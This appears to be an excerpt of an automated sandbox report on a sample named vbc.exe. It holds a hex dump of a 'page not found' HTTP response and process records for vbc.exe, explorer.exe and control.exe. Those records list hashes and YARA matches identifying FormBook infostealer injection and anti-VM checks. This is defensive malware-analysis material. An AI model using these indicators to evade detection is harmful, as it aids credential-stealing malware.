                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 31 2f 44 54 44 2f 78 68 74 6d 6c 31 31 2e 64 74 64 22 3e 0a 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 54 68 65 20 70 61 67 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 2f 2a 3c 21 5b 43 44 41 54 41 5b 2a 2f 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 30 30 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 30 2e 39 65 6d 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 73 61 6e 73 2d 73 65 72 69 66 2c 68 65 6c 76 65 74 69 63 61 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3a 6c 69 6e 6b 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 63 30 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3a 76 69 73 69 74 65 64 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 63 30 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 61 3a 68 6f 76 65 72 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 66 35 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 68 31 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 2e 36 65 6d 20 32 65 6d 20 30 2e 34 65 6d 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 32 39 34 31 37 32 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 6e 6f 72 6d 61 6c 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 2e 37 35 65 6d 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 20 32 70 78 20 73 6f 6c 69 64 20 23 30 30 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 68 31 20 73 74 72 6f 6e 67 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20
                                                Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en"> <head> <title>The page is not found</title> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /> <style type="text/css"> /*<![CDATA[*/ body { background-color: #fff; color: #000; font-size: 0.9em; font-family: sans-serif,helvetica; margin: 0; padding: 0; } :link { color: #c00; } :visited { color: #c00; } a:hover { color: #f50; } h1 { text-align: center; margin: 0; padding: 0.6em 2em 0.4em; background-color: #294172; color: #fff; font-weight: normal; font-size: 1.75em; border-bottom: 2px solid #000; } h1 strong { font-weight:


                                                Statistics

                                                Behavior

                                                Click to jump to process

                                                System Behavior

                                                General

                                                Target ID:0
                                                Start time:16:09:21
                                                Start date:08/08/2022
                                                Path:C:\Users\user\Desktop\vbc.exe
                                                Wow64 process (32bit):true
                                                Commandline:"C:\Users\user\Desktop\vbc.exe"
                                                Imagebase:0x4d0000
                                                File size:794112 bytes
                                                MD5 hash:BA5FA6EE78FE62B57CE7947F6BDB86FF
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:.Net C# or VB.NET
                                                Yara matches:
                                                • Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000000.00000002.408488225.0000000002B1D000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                • Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000000.00000002.407071082.00000000028F3000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000000.00000002.409203550.000000000397B000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000000.00000002.409203550.000000000397B000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000000.00000002.409203550.000000000397B000.00000004.00000800.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                • Rule: Formbook, Description: detect Formbook in memory, Source: 00000000.00000002.409203550.000000000397B000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                Reputation:low

                                                General

                                                Target ID:5
                                                Start time:16:09:34
                                                Start date:08/08/2022
                                                Path:C:\Users\user\Desktop\vbc.exe
                                                Wow64 process (32bit):false
                                                Commandline:C:\Users\user\Desktop\vbc.exe
                                                Imagebase:0x100000
                                                File size:794112 bytes
                                                MD5 hash:BA5FA6EE78FE62B57CE7947F6BDB86FF
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Reputation:low

                                                General

                                                Target ID:6
                                                Start time:16:09:36
                                                Start date:08/08/2022
                                                Path:C:\Users\user\Desktop\vbc.exe
                                                Wow64 process (32bit):true
                                                Commandline:C:\Users\user\Desktop\vbc.exe
                                                Imagebase:0xb00000
                                                File size:794112 bytes
                                                MD5 hash:BA5FA6EE78FE62B57CE7947F6BDB86FF
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Yara matches:
                                                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000006.00000000.403522788.0000000000401000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000006.00000000.403522788.0000000000401000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000006.00000000.403522788.0000000000401000.00000040.00000400.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                • Rule: Formbook, Description: detect Formbook in memory, Source: 00000006.00000000.403522788.0000000000401000.00000040.00000400.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                Reputation:low

                                                General

                                                Target ID:7
                                                Start time:16:09:44
                                                Start date:08/08/2022
                                                Path:C:\Windows\explorer.exe
                                                Wow64 process (32bit):false
                                                Commandline:C:\Windows\Explorer.EXE
                                                Imagebase:0x7ff77c400000
                                                File size:3933184 bytes
                                                MD5 hash:AD5296B280E8F522A8A897C96BAB0E1D
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Yara matches:
                                                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000007.00000000.463881212.000000000D63F000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                                • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000007.00000000.463881212.000000000D63F000.00000040.00000001.00040000.00000000.sdmp, Author: unknown
                                                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000007.00000000.463881212.000000000D63F000.00000040.00000001.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                • Rule: Formbook, Description: detect Formbook in memory, Source: 00000007.00000000.463881212.000000000D63F000.00000040.00000001.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000007.00000000.484050905.000000000D63F000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                                • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000007.00000000.484050905.000000000D63F000.00000040.00000001.00040000.00000000.sdmp, Author: unknown
                                                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000007.00000000.484050905.000000000D63F000.00000040.00000001.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                • Rule: Formbook, Description: detect Formbook in memory, Source: 00000007.00000000.484050905.000000000D63F000.00000040.00000001.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                Reputation:high

                                                General

                                                Target ID:13
                                                Start time:16:10:22
                                                Start date:08/08/2022
                                                Path:C:\Windows\SysWOW64\control.exe
                                                Wow64 process (32bit):true
                                                Commandline:C:\Windows\SysWOW64\control.exe
                                                Imagebase:0xaf0000
                                                File size:114688 bytes
                                                MD5 hash:40FBA3FBFD5E33E0DE1BA45472FDA66F
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Yara matches:
                                                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000D.00000002.632823935.0000000002DD0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000000D.00000002.632823935.0000000002DD0000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000D.00000002.632823935.0000000002DD0000.00000040.80000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000D.00000002.632823935.0000000002DD0000.00000040.80000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000D.00000002.631975004.0000000002CD0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000000D.00000002.631975004.0000000002CD0000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000D.00000002.631975004.0000000002CD0000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000D.00000002.631975004.0000000002CD0000.00000040.10000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000D.00000002.631553136.0000000000B90000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000000D.00000002.631553136.0000000000B90000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000D.00000002.631553136.0000000000B90000.00000004.00000800.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000D.00000002.631553136.0000000000B90000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                Reputation:moderate

                                                Disassembly

                                                No disassembly